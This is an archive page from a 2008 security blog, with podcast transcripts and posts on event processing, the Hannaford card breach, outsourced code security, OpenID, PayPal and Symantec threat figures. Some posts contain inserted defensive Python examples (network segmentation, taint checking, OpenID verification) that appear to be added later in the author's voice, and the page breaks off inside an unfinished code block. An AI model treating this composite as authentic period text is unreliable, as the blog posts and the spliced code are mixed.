May 17, 2008
Peter Schooff
Twenty-Four Seven Security
Peter Schooff's blog is a daily look at what's going on in the world of computer security with an emphasis on how it affects businesses.


April 30, 2008
The Business Benefits of Event Processing: A Talk With WebSphere's Paul MacKay

***Editor's Note: If you are interested in the fast developing world of Event Processing, then do not miss the first ever virtual conference on Event Processing taking place at ebizQ right here!

Listen to or download the 3:01-minute podcast below:




What follows is a transcript of my podcast with Paul MacKay, worldwide sales leader of IBM’s WebSphere, where we discuss event processing: what it is, how it can benefit your business, and finally, the role event processing plays in SOA.

First of all, why don’t you give me a quick overview of what Business Event Processing is.

Well, Peter, Business Event Processing is really a software technology that provides the ability to sense when electronic signals indicating an actionable business situation have occurred and to coordinate the right response at the right time.

Now, exactly what is the benefit of Business Event Processing?

Well, Business Event Processing provides tremendous benefit in that it enables real-time patterns of events coming from disparate sources throughout a corporate infrastructure to be detected and to be evaluated and acted upon. But in addition to that, what Business Event Processing does is it abstracts the level at which the specification of these patterns is formed, making it possible for business personnel themselves to take responsibility for designing, deploying and maintaining their own Business Event Processing patterns. That’s the real benefit.

The real benefit results in a much more rapid time to market, a much more rapid response to change, and empowering the business user to take responsibility for the implementation of its own Business Event Processing needs.


Make sure to catch Paul MacKay's Keynote Presentation at ebizQ's Event Processing virtual conference right here!

I can certainly see how companies would be interested in something like that. Now, what exact role does Business Event Processing play in SOA?

Well, SOA focuses on the user’s view of a system at a conceptual level. SOA is really an extension of Object-Oriented Programming ideas, the principle of modularity, the design of an organization of the related services into a single service server module. So it relates services into groups of server modules. And event processing is a completely different ability.

Event processing is at the level of business events now entering the picture with a conceptual paradigm for remote access. A user no longer needs to access a service. Instead, a user can access services by sending and receiving events asynchronously. So they’re really complementary, completely complementary paradigms doing completely different things. And together event processing and Service Oriented Architecture cover the entire waterfront of business needs.

Posted by pschooff in Podcast | Permalink | Comments (0) | TrackBacks (0)

April 29, 2008
What's All the Buzz About Event Processing? A Talk With BEA's Ruma Sanyal

***Editor's Note: If you are interested in the fast developing world of Event Processing, then do not miss the first ever virtual conference on Event Processing taking place at ebizQ right here!

Listen to or download the 6:27-minute podcast below:




What follows is a transcript of my podcast with Ruma Sanyal, Director of Worldwide Product Marketing for BEA's WebLogic Time and Event Driven Products, where Ruma explains all the buzz about Event Processing, how Event Processing works with SOA, BPM, and other implementations, and finally, how someone can get started with Event Processing.

Can you give me a quick overview of what Complex Event Processing is?

Sure. The straightforward definition of Complex Event Processing is as follows: Complex Event Processing correlates events into patterns that may present a threat or opportunity, typically processing vast amounts of data in real time. So although this is a great starting definition, I do want to add some color to that.

We prefer using the term “Event Processing” at least at BEA and when we speak with customers to refer to this area. We have found that in our discussions with customers and prospects that the term “Complex Event Processing” often conjures up images that it is a complex technology or the events involved have to be complex, etc.

So event processing we have found, is the term that is becoming popular as the umbrella term to describe simple event processing, which is events at a time with or without mediation, event driven architecture, event processing in the context of SOA, Service Oriented Architecture, and Business Process Management, BPM. As well as high performance often mission critical event processing, which is called “Complex Event Processing”, which is also perhaps the most interesting type of event processing and almost always the ultimate goal of any type of event processing.

So let's focus on this type of event processing for a minute. Typically, this includes high volumes of continuously or 'burstily' streaming events that are of consequence to the business, emanating from within and from outside the business. These events from various sources have to be filtered, aggregated, and correlated in real time into a pattern that may represent a threat or opportunity to the business.


Make sure to catch Ruma Sanyal's Keynote Presentation at ebizQ's Event Processing virtual conference right here!

After that, a business process management system, or a custom application, or a human being might take an action to respond appropriately. Complex Event Processing systems need very special capabilities: the ability to handle an order of magnitude higher performance in throughput and processing, and an ability to respond in real time.

So CEP, typically, is the upstream capability that is sensing events coming in. And once filtered and aggregated, these get funneled to other systems. So the performance has to be of a higher order.

And it seems like everywhere you look nowadays, you see something about Complex Event Processing. Why all this buzz?

Sure. The volume of data bombarding an enterprise is increasing exponentially. Gartner estimates that today a large enterprise is being hit with 10,000 to ten million events per second. Network bandwidth is not constrained any more, transaction volumes have increased tremendously, new types of transactions and interactions are emerging, so you need to be able to handle tremendous amounts of data.

Now, if you look at it from a slightly different angle from a technology evolution perspective, about 50% of the enterprises are well underway in their SOA implementation, another 40% have specific plans. Once all these services get invoked at the various layers of the enterprise, there will be tremendous amounts of data flowing through the enterprise backplane and event processing is the only technology, reasonable technology and cost effective technology that can take advantage of that.

So that's sort of from the supply side of data. And then from the demand side, couple that with the fact that customers and markets are becoming increasingly impatient in terms of standard of service and how service needs to continuously improve. A very simple example of that is expectations around overnight delivery.

The SLA for that has increased tremendously. Also, the final kicker is cost containment. Feeling the heat of globalization, enterprises are increasingly focused on cost and CEP is the only technology that can address the data volume and the response time issues that I just referred to without putting in place really costly homegrown solutions.

Now, does this mean customers implementing SOA, or BPM, or BAM, or integration, do they have to start all over again?

Oh no, they don't, not at all. We conducted a primary market research survey in the fall of 2007 with, in fact, ebizQ, you guys, asking people about their event processing implementation goals. And of the 450 respondents, 70% said that they have implementation plans for event processing with their SOA, BPM, or BAM projects. This is absolutely the right approach.

Event processing is not a rip-and-replace technology but complementary to SOA and BPM. And as far as BAM is concerned, it is one of the first and foremost applications, you know, leveraging event processing. If you talk to Gartner's Roy Schulte, he will concur. Also, BAM is very complementary and almost required for a BPM implementation.

So you can see how these are all sort of tied together and they should all be thought of as complementary technologies coexisting with each other and interfacing with each other.

Excellent. So how does someone get started with event processing?

So I sort of have a three-pronged advice. Here's sort of my advice based on what I've seen that works well with customers. Number one, think about your business with an event lens: think about events, their sources, their consumers, and things of that nature. Then number two, if you are implementing a SOA or a BPM project, think about which part of it lends itself well to event processing.

Are parts of some of your business process going to benefit from real-time information and real-time action? I think absolutely. Your challenge is to identify those. Can your services be represented as events and do they need to be? The answer in certain cases is absolutely. And then number three, identify a small project.

Typically, I have seen what really works well is a BAM implementation. Say for a particular business function like your sales order, implement event processing for such a project and prove success to the rest of the organization; it's that easy.

Posted by pschooff in Podcast | Permalink | Comments (0) | TrackBacks (0)

April 28, 2008
SOA Adding to Application Insecurity

Found some interesting data in this Quocirca White Paper that, while I'm quite aware that few companies put out White Papers that find their product is wildly unneeded, does have some interesting findings.

For one, the companies that admitted to being frequently hacked outsource at least some of their software development. Germans were the least likely to outsource their code, while Americans were the most likely (40% outsourcing for Germans, 61% for the United States of Somewhere Else). Note: to listen to my podcast on the subject of outsourcing and application security, click here.

66% of respondents said they were either using or in the process of adopting SOA (with the fewest in the UK and the most in Germany), but admitted that they understood little about the threats SOA would introduce.

Finally, data protection is the key motivating factor behind companies getting serious about application security.

Gotta say, it makes sense to me.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

April 25, 2008
How PCI Compliant Companies Get Breached
Fight back against security threats by getting ebizQ's Security Update Newsletter delivered to your inbox. Sign-up here.

An interesting post over at Security Fix goes into detail on the recent Hannaford breach, in which 4.2 million credit and debit card numbers were stolen from store networks.

And what makes this story interesting is that Hannaford was no TJX, as in they weren't just leaving their data tucked behind the store sock display in open sight. In fact, Hannaford had been certified PCI compliant both in 2007 and again in early 2008, but what that proves is that PCI simply isn't extensive enough.

Simply put, PCI compliance is mostly written for e-tailers, and not for brick-and-mortar businesses with most of their assets existing offline (which is a little harder to pin down with a simple software fix). As the perps haven't been caught yet (if someone calls up and tries to charge a yacht on their credit card without even looking at it, call the authorities), experts are currently speculating that it was likely an inside job.

So how'd they do it? Most security defenses can be compared to a candy bar, i.e. crunchy on the outside, creamy and data-rich in the center, and once the intruders gained access, it was easy for them to move around and do their damage, which in Hannaford's case enabled the infiltrators to install malware on the point-of-sale systems of 294 stores and simply collect the credit and debit card numbers as each transaction was authorized (to listen to my podcast on this very subject, click right here).

How do you stop it? Network segmentation. Said Avivah Litan of Gartner Inc., "The PCI standards don't recognize that there's no good reason for a company's stores to be able to talk to one another when it comes to [processing] card data. The fact that malware was spread across almost 300 stores shows there wasn't good network segmentation in place at Hannaford."
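To make the segmentation point concrete, here is an added example (mine, not from the Security Fix post, and not a description of Hannaford's actual network) that evaluates a store-network access policy over constructed traffic. The IP plan, the zone names and the rules are all assumptions. Under a flat "allow everything" policy an infected POS host in one store can reach the POS tier of every other store over SMB; under a segmented policy that only lets POS hosts talk to the central card-processing gateway on 443, the same traffic is dropped while card authorizations still go through.

```python
"""Added example: store-network segmentation policy check (Python 3 stdlib).

Addresses, zone names and rules are assumptions for the demo, not
Hannaford's real network.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Assumed addressing plan: each store has a /24; POS hosts sit in the upper
# half (.128-.255), back-office LAN hosts in the lower half. The central
# card-processing gateway lives in its own /24.
STORE_NETS = {ipaddress.ip_network(f"10.{n}.0.0/24"): f"store-{n:03d}" for n in range(1, 5)}
GATEWAY_NET = ipaddress.ip_network("10.200.0.0/24")


def zone_of(ip: str) -> str:
    """Map an address to 'gateway', 'store-NNN/pos', 'store-NNN/lan' or 'other'."""
    addr = ipaddress.ip_address(ip)
    if addr in GATEWAY_NET:
        return "gateway"
    for net, store in STORE_NETS.items():
        if addr in net:
            tier = "pos" if int(addr) - int(net.network_address) >= 128 else "lan"
            return f"{store}/{tier}"
    return "other"


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    src_zone: str           # exact zone, "*/pos"-style tier wildcard, or "*"
    dst_zone: str
    dport: Optional[int]    # None matches any port
    action: str             # "allow" or "deny"


def _zone_match(pattern: str, zone: str) -> bool:
    if pattern == "*":
        return True
    if pattern.startswith("*/"):
        return zone.endswith(pattern[1:])   # "*/pos" matches "store-002/pos"
    return pattern == zone


def evaluate(rules: List[Rule], flow: Flow) -> str:
    """First-match rule evaluation with an implicit final deny."""
    src_zone, dst_zone = zone_of(flow.src), zone_of(flow.dst)
    for rule in rules:
        if (_zone_match(rule.src_zone, src_zone)
                and _zone_match(rule.dst_zone, dst_zone)
                and (rule.dport is None or rule.dport == flow.dport)):
            return rule.action
    return "deny"


# The flat "crunchy outside, creamy inside" network: anything inside may talk to anything.
FLAT_POLICY = [Rule("*", "*", None, "allow")]

# Segmented: POS hosts reach only the gateway, and only the authorization service;
# every other path, including store-to-store, is denied.
SEGMENTED_POLICY = [
    Rule("*/pos", "gateway", 443, "allow"),
    Rule("*", "*", None, "deny"),
]

# Constructed traffic: a compromised POS host in store 1 tries SMB (445) to the POS
# tier of three other stores, the way malware spreading between stores would, plus
# one legitimate card authorization to the gateway.
LATERAL_ATTEMPTS = [Flow("10.1.0.200", f"10.{n}.0.200", 445) for n in (2, 3, 4)]
AUTHORIZATION = Flow("10.1.0.200", "10.200.0.10", 443)


def reachable_stores(rules: List[Rule], flows: List[Flow]) -> int:
    """Number of distinct stores an attacker can reach with the given flows."""
    return len({zone_of(f.dst).split("/")[0] for f in flows if evaluate(rules, f) == "allow"})


if __name__ == "__main__":
    for name, policy in (("flat", FLAT_POLICY), ("segmented", SEGMENTED_POLICY)):
        print(f"{name}: stores reachable by lateral movement = "
              f"{reachable_stores(policy, LATERAL_ATTEMPTS)}, "
              f"card authorization = {evaluate(policy, AUTHORIZATION)}")
```

The point of the second rule set is the final explicit deny: a real firewall policy for card-data zones should be written the same way, allow the one path the business needs and drop everything else, so that a foothold in one store has nowhere to go.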

For Hannaford, it's back to the security drawing board. They're putting military-strength security in place, so the next time you accidentally find a stun grenade in that bushel of apples you brought home from the supermarket, you know who to blame.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

April 23, 2008
Is Outsourcing an IT Dream or Security Nightmare: a Talk With Ounce Labs

Listen to or download the 7:57-minute podcast below:




What follows is a transcript of my podcast with Jack Danahy, Founder and Chief Technology Officer of Ounce Labs and one of the industry’s most prominent advocates for software security assurance. In this podcast we discuss the security perils of outsourcing application development, whose responsibility it is to assure that applications are secure, how to actually make sure they are secure, and what Jack thinks the future of application outsourcing is both in terms of risk and reward.

What are some of the main security problems that arise when a company outsources their application development?

I would probably characterize them in two buckets, and the first is communication. And we learned this early on as outsourcing was taking off in terms of functionality, that organizations had to be pretty specific about what they wanted if they wanted to get the most value out of the outsourcing. So the first one is communication and the second one is enforcement, where functionality is something, again, which can be designed for.



It can also be fairly easily tested for, and people know how to do that well. In security, the combination of these two things takes a slightly different form. A lot of organizations haven’t really stopped themselves internally to think about what security means for an application, or the business purpose for which they’re going to an outsourcer, nor have they thought hard about how they’re going to check to make sure that those things have been done.

So sometimes, what we’re seeing most is a lack of communication of what exactly an application is going to do and what it’s going to require in terms of security. And then on the back end, there is often a lack of sufficient enforcement technique and technology to be certain that the application as delivered satisfies those security requirements.

Great. Isn’t it the responsibility of the company developing the application to make sure it is secure?

Yeah, I think that’s exactly the right point. And the problem is that security is not a word that means the same thing for every application or to every organization. So I’ll give you an example. If I’m simply hosting a website, and all it’s going to be doing is soliciting market feedback for something, and it is fairly straightforward, and is not taking in private information or exposing private information, then its level of security is by its nature going to be lower than that of an application which is being developed perhaps to do payment, or transaction processing, or point-of-sale.

So as a result, the outsourcing group that’s responsible for developing the application may very well develop a perfectly secure application for some definition of security, but it may not fully understand the business purpose the application is going to be put to. And as a result, it may not be secure enough for that purpose. So the answer is, yes, they should design a secure application, but back to my earlier point on communication, it’s the responsibility of the organization asking them to build it to define what that means.

How common is it to have security vulnerability in an outsourced application?

I think, first off, it’s very, very common to have security vulnerabilities in a lot of different kinds of applications. One of the reasons why Ounce Labs is having the success we are is because a lot of organizations recognize that great applications meant to do a certain job, whether it was perhaps not intended to be networked, or was intended to take in less secure data, and either the landscape or the information needed has changed, aren’t necessarily designed to be as secure as they should be.

So this is not simply within the purview of outsourced applications but it’s pretty general. Outsourced applications are even more problematic, mainly, because of the fact that the organization developing it sometimes misses on the requirements for security for the groups that are actually asking them to build it.

And a good example of this would be any number of the outsourced applications that have resulted in some of the private information leakage. And many times, it’s a well-built application that simply didn’t understand that the information was going to be private-style information.

How can a company make sure their applications then are free of vulnerabilities when they’re outsourcing?

I think one of the things we want to talk about in terms of an outsourced application when we talk about vulnerabilities is the first version, or the first flavor of vulnerabilities we care about, are those which are sort of omitted problems, right. So I forgot to tell the provider that this information is going to be private and they should make sure that they never store it, or they only store it encrypted, or something like that.

And so the great way to do that is just tell them up front. The information that’s coming in this particular part of the application is going to be private; it’s confidential for me, or it’s going to be private for the user, so please be sure when you build your application that only authorized people can touch it, and only the people who are sending it in really know what it looks like, and if you have to store it, it’s stored in a safe manner. Right.

So that is one of the big places where adding this kind of value can help by giving them that information upfront. Once the software arrives, best efforts being what they are, it’s still the responsibility of the organization who’s going to be running the software to ensure that the software as delivered is going to meet those security requirements.

So we definitely recommend using software analysis technology such as Ounce Labs to go through that application and be able to very conclusively say every time this data comes in, it’s encrypted, or it’s always destroyed and never stored, or that the authorization model is sufficient to make sure that the wrong people don’t have access to it.

So it’s this combination of being upfront, and taking the time, and sort of having sort of the internal rigor to define clearly for the outsourcer what it should look like, and then having both within your contract language as you define those requirements, this capacity to do enforcement, and then actually doing the enforcement on the back end so when it lands you can check to make sure it’s what you thought it was.

What are some of the warning signs that you might not want a company to develop your applications?

Well, a lot of what we see is some really substantial, favorable traction among the outsourcing community for taking on this style of requirement gathering and this additional rigor in the development process.

But if you run into a company that says that they do not want to be held to this, that they don’t want the contract language to say that you’re going to reserve the right to check the code to make sure that it’s secure, or that you’re going to be asking them to do a specific set of things that you will later enforce within the contract with language and sometimes with cost recovery: if they’re unwilling to accept that, that should really raise a massive warning flag, because either, number one, their expectation is that they’re likely to make a mistake and not deliver it.

Or number two, that their existing processes are pretty rigidly defined and so it’s difficult for them to move off of those to support your needs from a security perspective. Or number three, that they have a lot of turnover perhaps in terms of their personnel and so they don’t have a sense of confidence that the actual people who will be doing the development are capable of manufacturing an application to the standards that you’ve given them.

So the main warning sign we look for is organizations which are reticent to support what, I think, are very, very straightforward security requirements, which look a lot like functional requirements that most organizations are happy to take on.

Now, what do you see as the future for both outsourcing in terms of both the risk and the rewards?

Well, I think that there continues to be a great deal of motion, not just from the cost-saving perspective, which clearly is one of the early drivers of outsourcing, but the capacity of outsourcing to allow organizations to focus more directly on their core businesses. So financial services institutions can focus on great financial transactions with their partners, or healthcare agencies can focus on healthcare and not on application development.

So I think that the ongoing rewards will remain largely the same as they have been, with this capacity to focus on your core business and achieve these cost savings. And I think the risks, as more organizations begin to treat security as a fundamental, almost functional requirement, I think what you’ll find happening is that the risks will actually go down.

I don’t think the risks are going to increase, because I think the biggest risks existed when organizations didn’t feel comfortable asking for more secure applications, didn’t feel comfortable in their definition, or didn’t feel comfortable, sort of, demanding that they be allowed to reserve the right to audit these things after they get delivered.

So I think what you’re actually going to see is that the rewards will continue to maintain their value and that the risks will actually decline as organizations take advantage of the knowledge that they can ask for specific security characteristics which will protect them from liability, and that they will actually be able to enforce those when they come over the wall, so that they will be more in keeping with their own internal and external compliance guidelines.
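As an added illustration of the kind of check Jack describes (verifying that private data is encrypted or never stored before an outsourced application is accepted), here is a toy static taint check written for this page. It is not Ounce Labs' product or method, and it is deliberately simple: it tracks variables per function, statement by statement. The source, sink and sanitizer function names and the two sample programs are constructed for the demo.

```python
"""Added example: a toy static taint check for "private data must be encrypted
before it is stored or logged". Not Ounce Labs' product or method; source,
sink and sanitizer names and the sample programs are constructed for the demo.
"""
import ast
from typing import List, Set, Tuple

SOURCES = {"read_private_field"}        # assumed: returns private user data
SINKS = {"store_record", "log_event"}    # assumed: persistence and logging sinks
SANITIZERS = {"encrypt"}                 # assumed: makes data safe to persist


def _call_name(node: ast.AST):
    """Simple function name of a Call node (f(...) or obj.f(...)), else None."""
    if isinstance(node, ast.Call):
        func = node.func
        if isinstance(func, ast.Name):
            return func.id
        if isinstance(func, ast.Attribute):
            return func.attr
    return None


def _is_tainted(expr: ast.AST, tainted: Set[str]) -> bool:
    """True if private data can reach this expression's value unsanitized."""
    name = _call_name(expr)
    if name in SANITIZERS:
        return False            # encrypt(...) cuts the flow
    if name in SOURCES:
        return True
    if isinstance(expr, ast.Name):
        return expr.id in tainted
    # any operand of a call, format string, binop, subscript... propagates taint
    return any(_is_tainted(child, tainted) for child in ast.iter_child_nodes(expr))


def find_leaks(source_code: str) -> List[Tuple[int, str]]:
    """Return (line, sink_name) for each sink call fed unsanitized private data.

    Taint is tracked per function in statement order; reassigning a variable
    from a clean expression clears its taint.
    """
    leaks = []
    tree = ast.parse(source_code)
    for func in [n for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)]:
        tainted: Set[str] = set()
        for stmt in func.body:
            for node in ast.walk(stmt):
                if isinstance(node, ast.Assign):
                    names = [t.id for t in node.targets if isinstance(t, ast.Name)]
                    if _is_tainted(node.value, tainted):
                        tainted.update(names)
                    else:
                        tainted.difference_update(names)
                if _call_name(node) in SINKS and any(_is_tainted(a, tainted) for a in node.args):
                    leaks.append((node.lineno, _call_name(node)))
    return leaks


# Constructed sample programs (kept as strings so they are analysed, not run).
VULNERABLE = '''
def register(req, db, key):
    ssn = read_private_field(req, "ssn")
    store_record(db, ssn)                # persisted in the clear
    log_event("registered %s" % ssn)     # leaks into the log
'''

FIXED = '''
def register(req, db, key):
    ssn = read_private_field(req, "ssn")
    token = encrypt(ssn, key)
    store_record(db, token)              # only ciphertext is persisted
    log_event("registered a new user")   # no private data in the log line
'''

if __name__ == "__main__":
    print("vulnerable:", find_leaks(VULNERABLE))   # [(4, 'store_record'), (5, 'log_event')]
    print("fixed:     ", find_leaks(FIXED))        # []
```

A real tool does this across files, call boundaries and data stores, but the contract clause Jack mentions maps directly onto the three sets at the top: the customer names the sources (which inputs are private), the sinks (where it must never land in the clear) and the sanitizers (what counts as "stored safely"), and the check is then mechanical.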

Posted by pschooff in Podcast | Permalink | Comments (0) | TrackBacks (0)

April 22, 2008
Single Sign-On Gaining Web Momentum

According to a post over at the Digital Identity Forum, one of the things people most dislike about using the web is the plethora of passwords required to access all the highways and byways of the information superhighway (does anyone use that phrase anymore, or has it been upgraded to the information super-duper-highway?).

And if you look at all the password tollbooths needed to access all the various places on the info superhighway, it starts to look more like driving the Garden State Parkway down to the Jersey Shore (which has something like a million tollbooths).

Enter OpenID, which promises single sign-on across the web: you log in once at an OpenID provider, and the provider vouches for you to any site that accepts OpenID. The only problem is that, at this point, "across the web" is not all that extensive. But recently, both Yahoo and Blogger have joined the ranks of OpenID providers, which means you can use your Yahoo or Blogger account (and its password) as an OpenID to log on to sites that accept it.

While it's still not complete, as neither site yet lets you log on to it with an OpenID from elsewhere, it's a start. Now if you could only remember your Yahoo password.
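For readers wondering what actually happens when a site "accepts OpenID", here is an added example (not from the Digital Identity Forum post) of the relying party's half of an OpenID 2.0 login: verifying the provider's signed assertion. It follows the OpenID Authentication 2.0 signing rules (key-value form of the fields listed in openid.signed, HMAC with the association's MAC key, base64 in openid.sig) and includes the replay check on response_nonce the spec requires. The association handle, MAC key, provider URLs and nonce are constructed values.

```python
"""Added example: relying-party verification of an OpenID 2.0 positive assertion.

Follows the OpenID Authentication 2.0 signing rules (key-value form of the
fields named in openid.signed, HMAC with the association MAC key, base64 in
openid.sig). Association handle, MAC key, URLs and nonce are constructed.
"""
import base64
import calendar
import hashlib
import hmac
import time
from typing import Dict, Set


def key_value_form(params: Dict[str, str], signed_fields) -> bytes:
    """'key:value\\n' per signed field, keys without the 'openid.' prefix."""
    return "".join(f"{k}:{params['openid.' + k]}\n" for k in signed_fields).encode()


def sign_assertion(params: Dict[str, str], mac_key: bytes) -> str:
    """What the provider does for an HMAC-SHA256 association."""
    fields = params["openid.signed"].split(",")
    digest = hmac.new(mac_key, key_value_form(params, fields), hashlib.sha256).digest()
    return base64.b64encode(digest).decode()


def nonce_time(nonce: str) -> int:
    """Nonces start with a UTC timestamp 'YYYY-MM-DDThh:mm:ssZ'; the rest is opaque."""
    return calendar.timegm(time.strptime(nonce[:20], "%Y-%m-%dT%H:%M:%SZ"))


def verify_assertion(params, associations, seen_nonces, expected_return_to, now, skew=300):
    """Relying-party checks. Returns (accepted, reason)."""
    if params.get("openid.mode") != "id_res":
        return False, "not a positive assertion"
    if params.get("openid.return_to") != expected_return_to:
        return False, "return_to mismatch"
    signed = set(params.get("openid.signed", "").split(","))
    required = {"op_endpoint", "return_to", "response_nonce", "assoc_handle"}
    required |= {f for f in ("claimed_id", "identity") if "openid." + f in params}
    if required - signed:
        return False, "unsigned fields: " + ",".join(sorted(required - signed))
    mac_key = associations.get(params.get("openid.assoc_handle"))
    if mac_key is None:
        return False, "unknown association handle"
    try:
        expected = sign_assertion(params, mac_key)
    except KeyError:
        return False, "signed field missing from response"
    if not hmac.compare_digest(expected, params.get("openid.sig", "")):
        return False, "bad signature"
    nonce = params["openid.response_nonce"]
    try:
        issued = nonce_time(nonce)
    except ValueError:
        return False, "malformed nonce"
    if abs(now - issued) > skew:
        return False, "nonce outside acceptance window"
    if nonce in seen_nonces:
        return False, "nonce replayed"
    seen_nonces.add(nonce)
    return True, "ok"


# Constructed demo state: one prior association and the relying party's return URL.
ASSOCIATIONS = {"assoc-demo-1": hashlib.sha256(b"constructed association secret").digest()}
RETURN_TO = "https://rp.example/openid/return"
NONCE = "2008-04-22T12:00:00Zr4nd0m"
NOW = nonce_time(NONCE) + 10   # ten seconds after the provider issued it


def provider_response(identity="https://alice.op.example/") -> Dict[str, str]:
    """Build the signed assertion the provider would redirect the browser back with."""
    params = {
        "openid.ns": "http://specs.openid.net/auth/2.0",
        "openid.mode": "id_res",
        "openid.op_endpoint": "https://op.example/server",
        "openid.claimed_id": identity,
        "openid.identity": identity,
        "openid.return_to": RETURN_TO,
        "openid.response_nonce": NONCE,
        "openid.assoc_handle": "assoc-demo-1",
        "openid.signed": "op_endpoint,claimed_id,identity,return_to,response_nonce,assoc_handle",
    }
    params["openid.sig"] = sign_assertion(params, ASSOCIATIONS["assoc-demo-1"])
    return params


def run_demo():
    seen: Set[str] = set()
    genuine = provider_response()
    first = verify_assertion(genuine, ASSOCIATIONS, seen, RETURN_TO, NOW)[1]
    replay = verify_assertion(genuine, ASSOCIATIONS, seen, RETURN_TO, NOW)[1]
    forged = dict(provider_response(), **{"openid.identity": "https://bob.op.example/"})
    tampered = verify_assertion(forged, ASSOCIATIONS, seen, RETURN_TO, NOW)[1]
    return [first, replay, tampered]


if __name__ == "__main__":
    print(run_demo())   # ['ok', 'nonce replayed', 'bad signature']
```

The two checks that relying-party code most often skips are the ones at the end: that the identity-bearing fields are actually inside openid.signed (otherwise an attacker can swap in another identity under a valid signature) and that a response_nonce is accepted only once, since the assertion arrives through the user's browser and can be replayed.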

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

April 21, 2008
Stemming Cybercriminal Cash Flow

One wonders, with all the criminal activity that's going on in the web, where oh where does all that electronic cash go?

According to an article at Security Focus, while the US Department of Justice has had some success going after online money laundering sites in countries that continue to be hacker havens, just as many spring up to meet demand.

"Our hopes are that, at some point, we can bring Russia on board with these cybercriminal investigations," Cox said. "In the past, we had written off Russia and Romania (thinking) we would never get cooperation from them."

The DOJ has also beefed up its cybercriminal resources, growing from 10 attorneys in 2000 to 30 today (while you could figure the increase in cybercrime dwarfs that growth). But you can also point to the recent arrest of 11 Romanians as some evidence that the US is having some success in getting the more cyberlawless countries to cooperate.

But still, it's a mighty big world wide web, and while you do need online law enforcement, trying to stop cybercrime by stopping the criminals is like trying to stop cancer by outlawing it.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

April 18, 2008
PayPal to Ban Unsafe Browsers

In what I find is a very interesting decision (leave it to the financial sites to lead the way for cutting-edge security), PayPal has announced that it will start banning unsafe browsers, saying that allowing customers to continue making online transactions with unsafe browsers "is equal to a car manufacturer allowing drivers to buy one of their vehicles without seat belts."

According to eWeek, PayPal, which is one of the most often imitated sites in phishing attacks, is in the process of blocking any transaction using a Web browser that doesn't have anti-phishing protection.

PayPal, one of the brands most spoofed in phishing attacks, is working on a plan to block its users from making transactions from Web browsers that don't provide anti-phishing protection. PayPal, which is owned by eBay, said that it will no longer support browsers that do not have blocking for identity theft-related Web sites or do not support EV SSL (Extended Validation Secure Sockets Layer) certificates.

In a white paper that details the five-pronged plan, PayPal specifically mentioned a group of customers who continue to use old and 'unsafe' browsers. "At PayPal, we are in the process of reimplementing controls which will first warn our customers when logging in to PayPal of those browsers that we consider unsafe. Later, we plan on blocking customers from accessing the site from the most unsafe—usually the oldest—browsers," the paper states.

Among the 'unsafe' browsers mentioned were old and no-longer-supported versions of Internet Explorer, as well as Apple's Safari browser, which has no anti-phishing protection and does not support EV SSL certificates. And while an EV SSL certificate is not completely fail-safe, PayPal believes it does offer a quick visual cue for safe versus unsafe sites when surfing the Web (and one that would likely be improved upon). Separately, both Firefox and Opera have announced their intention to start supporting EV SSL.

Now let's hope PayPal doesn't start banning people that continually make tacky purchases on eBay. Which reminds me, I wonder how much that purple Elvis Lava Lamp is selling for now?

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

April 16, 2008
How Microsoft Views the Future of Security

Since my podcast a month ago with Bruce Schneier over the future of security (which you can listen to for yourself right here), I've kept close watch on his prediction that security would keep getting more integrated and less obtrusive, until one day it was entirely encapsulated within the application or service you're using.

In another sign that this is in fact the direction the industry is going, last week Microsoft announced at RSA that they were looking to take a back-to-basics approach to security (is that sort of like saying 'Turn around and run from Vista as fast as possible!'?). According to Search Security, Microsoft is looking to prevent future infections and attacks by using features like whitelisting, further integration of TPMs and more use of code signing.

While these approaches have already been put to use in Windows XP and Vista, Microsoft continues to search for ways to make the OS as well as core applications smarter and more efficient in order to block threats as early as possible, while making them more automated and less intrusive.

"The threats are more complex. It's a maze now. We're seeing on average about a thousand new threats every day," said Vinny Gullotto, head of Microsoft's Malware Protection Center. "I'd say back in the days of LoveLetter and Nimda, we would see about 500 a month. Signature-based technology should be a final backstop. Behavior monitoring should be the main defense."

Still, Microsoft acknowledged that targeted threats like rootkits and custom Trojans used in many spear-phishing attacks represent a unique problem that won't be solved by signature-based tools. And Gullotto predicted that we have not even seen the peak of the problem just yet.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

April 15, 2008
How Does Intel Measure Security ROI?

Found a link over on Mike Rothman's Security Incite referring to Intel's Matthew Rosenquist's talk at last week's RSA on their process to justify security investments. And like those old E.F. Hutton ads from what must be about twenty years ago, when Intel talks about security, IT people listen.

According to Intel, their Return on Security Investment (ROSI) has a much higher level of accuracy than any other method currently being used. And while they admit that it's not a one-size-fits-all metric, and most companies only want value measured their way, they say it does offer an empowering view of security value, which is likely a much better approach in the boardroom than the typical security sales pitch of, "Do this or else."

Intel breaks it down into five different topics, which are:

1) Practical Aspects of Measuring Security

2) Getting a Return on IT Security Investment

3) Managing the Effort to Measure Security

4) The Problem of Measuring Information Security

5) The Four Dirty Questions of Measuring Information Security

Definitely a recommended read right here.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)

April 14, 2008
Has Security Reached the 'Tipping Point'?

***Editor's Note: If you're interested in the secure B2B identity architecture of tomorrow , make sure you sign up for the Federation and User Centric Identity webinar today!

According to Symantec's most recent Internet Security Threat Report, the security industry is very near the tipping point (and by that I don't mean the point where you start thinking of rewarding the wait staff for their exceptional service).

As spelled out by Symantec, the tipping point in security comes when the number of legitimate programs is outnumbered by malicious or illegitimate ones. And in Symantec's last security report, they identified 1,122,311 unique threats, of which 711,912 were known to be created in 2007, which represents a 468 percent increase from 2006.

Why this is significant is, in terms of proper white listing and black listing, with so many ill intentioned programs looking to do damage, it makes black listing all that badware virtually impossible, and leaves white listing as the only sane alternative. And from those numbers, it clearly looks like we've passed the security tipping point, and maybe not in the too distant future TIPS will mean too insure proper security.
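To make the blacklist-versus-whitelist point concrete, here is an added example (my illustration, not anything from Symantec's report) that makes the same run/don't-run decision for one file both ways. The executables are constructed byte strings standing in for files on an endpoint, and the lists are keyed by SHA-256 of the file contents; no real malware or real hashes are involved.

```python
"""
Added example (not from the original post): the same endpoint execution
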